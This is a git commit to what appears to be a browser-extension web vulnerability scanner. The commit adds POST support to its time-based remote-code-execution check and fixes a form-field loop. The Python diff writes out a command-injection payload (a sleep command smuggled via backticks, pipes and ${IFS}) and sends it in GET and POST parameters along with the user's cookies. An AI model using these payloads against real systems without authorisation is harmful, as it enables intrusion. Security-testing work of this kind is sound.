POST Scan RCE + Bugfix: Handling ALL data for POST

master
swisskyrepo 2016-12-30 23:11:49 +01:00
parent d46a0edb79
commit 43e7eb8f06
3 changed files with 27 additions and 11 deletions

View File

@ -115,10 +115,12 @@ chrome.tabs.onUpdated.addListener(function(tabId,changeInfo, tab) {
// Detect value of inputs of the form
post_data = '';
for (var j = 0; j < document.forms[i-1].elements.length -1; j++) {
for (var j = 0; j < document.forms[i-1].elements.length; j++) {
post_data += (document.forms[i-1].elements[j].name+":"+document.forms[i-1].elements[j].value+"|");
console.log(post_data);
}
// Send data to this plugin (POST Scan) - check the method, GET is already handle with onUpdated
if(post_data != '' && document.forms[i-1].method.toUpperCase() == 'POST'){
chrome.runtime.sendMessage({type: "scan_plz", data:post_data, url:document.location.href, cookie:document.cookie}, function() {});

View File

@ -50,7 +50,7 @@ You can try the Error SQL, Blind SQL, LFI with Damn Vulnerable Web App
## TODO - Work in progress
- Should detect target in source code.. (list of targets, then launch scan)
- Do scan_rce/xss for POST with data dict
- Do xss for POST with data dict
## Thanks
- Polyglot vector for SQL injections [The Ultimate SQL Injection Payload](https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/)

View File

@ -159,21 +159,35 @@ def scan_rce(method, vulns, url, fuzz, cookie, useragent, data):
4  : commande introuvable
"""
# Payload URL-encoded of `#'|sleep${IFS}4|'`\"|sleep${IFS}4|\";sleep${IFS}4"
payload = "%60%23%27%7Csleep%24%7BIFS%7D4%7C%27%60%22%7Csleep%24%7BIFS%7D4%7C%22%3Bsleep%24%7BIFS%7D4"
payload_post = '`#\'|sleep${IFS}4|\'`"|sleep${IFS}4|";sleep${IFS}4'
payload_get = "%60%23%27%7Csleep%24%7BIFS%7D4%7C%27%60%22%7Csleep%24%7BIFS%7D4%7C%22%3Bsleep%24%7BIFS%7D4"
# POST
if (method == 'POST'):
inject = dict(data)
inject[fuzz] += payload_post
time1 = datetime.datetime.now()
content = requests.post(url, data=inject ,cookies=cookie, headers={'user-agent': useragent} ).text
# Change the inject to have a nice display in the plugin
inject = url + ":" + fuzz + ":" + inject[fuzz]
# GET
else:
# Do a request and check the response time
inject = url.replace(fuzz+"=", fuzz+"="+payload)
inject = url.replace(fuzz+"=", fuzz+"="+payload_get)
time1 = datetime.datetime.now()
content = requests.get(inject, cookies=cookie, headers={'user-agent': useragent}).text
# Check - The payload will force a delay of 5s at least.
time2 = datetime.datetime.now()
diff = time2 - time1
diff = (divmod(diff.days * 86400 + diff.seconds, 60))[1]
# The payload will force a delay of 5s at least.
if diff > 2:
print "\t\t\033[93mRCE Detected \033[0m for ", fuzz, " with the payload :", payload
print "\t\t\033[93mRCE Detected \033[0m for ", fuzz, " with the payload :", payload_get
vulns['rce'] += 1
vulns['list'] += 'RCE|TYPE|'+inject+'|DELIMITER|'
else:
print "\t\t\033[94mRCE Failed \033[0m for ", fuzz, " with the payload :", payload
print "\t\t\033[94mRCE Failed \033[0m for ", fuzz, " with the payload :", payload_get